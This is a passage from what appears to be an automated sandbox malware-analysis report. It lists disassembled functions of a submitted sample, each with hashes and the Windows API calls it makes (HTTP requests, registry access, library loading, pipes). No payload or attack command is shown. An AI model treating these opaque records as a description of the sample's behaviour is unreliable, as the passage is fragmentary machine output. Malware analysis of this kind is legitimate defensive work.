                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 32d4e3b56862e702530fd202a7b73ae27d59d73dd9710d910ce63fad1a9c2c9e
                      • Instruction ID: 757aa4cd8e633f7a21de937452b022a4e022a263167b7cbad0e0bcb8ba06badc
                      • Opcode Fuzzy Hash: 32d4e3b56862e702530fd202a7b73ae27d59d73dd9710d910ce63fad1a9c2c9e
                      • Instruction Fuzzy Hash: C151D031609302AED7259F38C845A6BB7E4EF45364F046A2EF895F3291DB70CE468763
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00ECDAFB
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00ECDB0C
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00ECDB8E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                      • Instruction ID: 46af4e634bb86ddc7dfc1ba597ead8d23c08a45799fd219c2c3649885152bddb
                      • Opcode Fuzzy Hash: 89fad5c9bcfe49b3a1fa1c385411d9df5d6a86eab376b4066a1f0dd3eb991d30
                      • Instruction Fuzzy Hash: 86418DB1604208DFDB04CF15CD84F9ABBB9EF44310F1590AEA905AF206D7B2DD45DBA0
                      APIs
                      • _memset.LIBCMT ref: 00ED2CAF
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2CCB
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2D11
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F36890,00000000), ref: 00ED2D5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                      • Instruction ID: 3d9588f82736e1337a998ef05e300af70c90738085b798eb39ab5d3536243e63
                      • Opcode Fuzzy Hash: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                      • Instruction Fuzzy Hash: 4D41A0302043019FD724DF24C844B5ABBE9EFD5324F14565EFA65AB391D770E906CB92
                      APIs
                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                        • Part of subcall function 00E779AB: _memmove.LIBCMT ref: 00E779F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharLower_memmove
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 3425801089-567219261
                      • Opcode ID: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                      • Instruction ID: f844adc26d13edb117d6cd6b25ae84f7768fcf80bf876e8cc0c4d7d0433459d4
                      • Opcode Fuzzy Hash: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                      • Instruction Fuzzy Hash: F531A471504619AFCF10EF55CC819EEB3F4FF05314B11962AE869B76D1DB71A905CB80
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC93F6
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9409
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9439
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove$ClassName
                      • String ID: ComboBox$ListBox
                      • API String ID: 365058703-1403004172
                      • Opcode ID: 1dcfe1b5a98086b97fc6427653079af8890405b8e7af7f766e8b3473b4c6a5c6
                      • Instruction ID: e1232e528ab20294ac912f9efb6be6702055cb9af18dacfd20e8cdd51868173f
                      • Opcode Fuzzy Hash: 1dcfe1b5a98086b97fc6427653079af8890405b8e7af7f766e8b3473b4c6a5c6
                      • Instruction Fuzzy Hash: 25210671A00104AEDB18AB74DC8ADFFB7B8EF45350B10912DF925B71E1DB364A0BD610
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1B40
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE1B66
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EE1B96
                      • InternetCloseHandle.WININET(00000000), ref: 00EE1BDD
                        • Part of subcall function 00EE2777: GetLastError.KERNEL32(?,?,00EE1B0B,00000000,00000000,00000001), ref: 00EE278C
                        • Part of subcall function 00EE2777: SetEvent.KERNEL32(?,?,00EE1B0B,00000000,00000000,00000001), ref: 00EE27A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3113390036-3916222277
                      • Opcode ID: f0527095ceb555ce324e15e2c289ee98fd6116379a4e9ba4aaccf0c49c87ccd4
                      • Instruction ID: 8527993f1952f99be8d3949d5d97ea4dae7c53048d00e59d7b8124bd4812d6b9
                      • Opcode Fuzzy Hash: f0527095ceb555ce324e15e2c289ee98fd6116379a4e9ba4aaccf0c49c87ccd4
                      • Instruction Fuzzy Hash: A0219FB150024CBFEB119F629C85EBFB7ECEB89748F10516AF505B6240EB309D499771
                      APIs
                        • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                        • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                        • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF66D0
                      • LoadLibraryW.KERNEL32(?), ref: 00EF66D7
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF66EC
                      • DestroyWindow.USER32(?), ref: 00EF66F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                      • Instruction ID: 2e2434f7fe9378bd962ddbb880cb08cafd21037ba5bc81826f5029dbd673cd9b
                      • Opcode Fuzzy Hash: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                      • Instruction Fuzzy Hash: 8D215B7120020ABFEF105F64EC80EBB77ADEF99368F116629FA11E6190DB71DC51A760
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 00ED705E
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7091
                      • GetStdHandle.KERNEL32(0000000C), ref: 00ED70A3
                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED70DD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                      • Instruction ID: 35f5873eefe12a8ce9462e3945def6877e938b22488134469b5545f995afaaef
                      • Opcode Fuzzy Hash: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                      • Instruction Fuzzy Hash: 63218174604209ABDF209F29DC05AAA77E8EF44724F205A1AFDE0E73D0E7709852CB50
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED712B
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED715D
                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED716E
                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED71A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                      • Instruction ID: a1bc860f726371eebc923e9590a0bf2e7f56816f5ef5f3abed715404dc3e6ef8
                      • Opcode Fuzzy Hash: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                      • Instruction Fuzzy Hash: EE21A175605206ABDB209F699C04AAAB7E8EF55724F201B1AFCF0F73D0E7709842CB51
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00EDAEBF
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDAF13
                      • __swprintf.LIBCMT ref: 00EDAF2C
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EFF910), ref: 00EDAF6A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                      • Instruction ID: a940ed22884414dbe638867ab3cc282b9d87032ba83ca842bf5a8700abc948e7
                      • Opcode Fuzzy Hash: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                      • Instruction Fuzzy Hash: 62216030A00209AFCB10DB65C985DAE7BF8EF89704B0040A9F909BB352DB71EA45CB21
                      APIs
                        • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                        • Part of subcall function 00ECA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                        • Part of subcall function 00ECA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                        • Part of subcall function 00ECA37C: GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                        • Part of subcall function 00ECA37C: AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                      • GetFocus.USER32 ref: 00ECA554
                        • Part of subcall function 00ECA3C5: GetParent.USER32(?), ref: 00ECA3D3
                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECA59D
                      • EnumChildWindows.USER32(?,00ECA615), ref: 00ECA5C5
                      • __swprintf.LIBCMT ref: 00ECA5DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                      • String ID: %s%d
                      • API String ID: 1941087503-1110647743
                      • Opcode ID: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                      • Instruction ID: 2539261973b604c3c07a198cd5eb4d2d28b6854a08052351e9e8f2f095062ece
                      • Opcode Fuzzy Hash: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                      • Instruction Fuzzy Hash: 2011A271600308ABDF107F64DD85FFE77B8AF89708F085079FA18BA192CA7159468B75
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00ED2048
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                      • API String ID: 3964851224-769500911
                      • Opcode ID: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                      • Instruction ID: 6dd0eb3e0c391d54921a5284d4cc747cff82acdf8c8e39af85dd59e5c43aa51d
                      • Opcode Fuzzy Hash: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                      • Instruction Fuzzy Hash: 03115B309001198FCF00EFA4D9514EEB7F4FF25304B54986AD855B7352EB32691BDB51
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEEF1B
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEEF4B
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF07E
                      • CloseHandle.KERNEL32(?), ref: 00EEF0FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                      • Instruction ID: b027f8f48297d5290bbbe286d2046331c4377c6e08bba0da3700ea6b5767d13a
                      • Opcode Fuzzy Hash: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                      • Instruction Fuzzy Hash: 92814E716043019FD720DF29C886B6AB7E5EF88720F14982DF999EB292DB70AD40CB51
                      APIs
                        • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                        • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0388
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF03C7
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF040E
                      • RegCloseKey.ADVAPI32(?,?), ref: 00EF043A
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF0447
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      • Opcode ID: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                      • Instruction ID: 2e489be1ed560afb63f989b34fb2d33b24280af48785290845fbafc3ca5d242d
                      • Opcode Fuzzy Hash: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                      • Instruction Fuzzy Hash: 8E513A31208204AFD704EF64C881E7EB7E9FF84314F44992EF699A7292DB31E905CB52
                      APIs
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDC3B
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDCBE
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EEDCDA
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDD1B
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDD35
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                        • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                      • String ID:
                      • API String ID: 327935632-0
                      • Opcode ID: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                      • Instruction ID: 4467aa36dab96b5c9670e3df1d6c27908c97f22bc703f4075831882c03728512
                      • Opcode Fuzzy Hash: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                      • Instruction Fuzzy Hash: CD512435A042099FCB01EFA9C8849ADF7F4EF48324B15D069E819AB362DB70AD45CF91
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDE88A
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDE8B3
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDE8F2
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDE917
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDE91F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      • Opcode ID: aef8509de4a65d9680243520d7f314824bab2fe017829735e543b81b5a3e6936
                      • Instruction ID: 0b723947f190294ab5952262815eb5ea3d16a2eefa4fbea8ec9b57d549e9f96b
                      • Opcode Fuzzy Hash: aef8509de4a65d9680243520d7f314824bab2fe017829735e543b81b5a3e6936
                      • Instruction Fuzzy Hash: 45512835A00205EFDF05EF64C985AAEBBF5EF48314B1490A9E909BB362DB31ED11DB50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
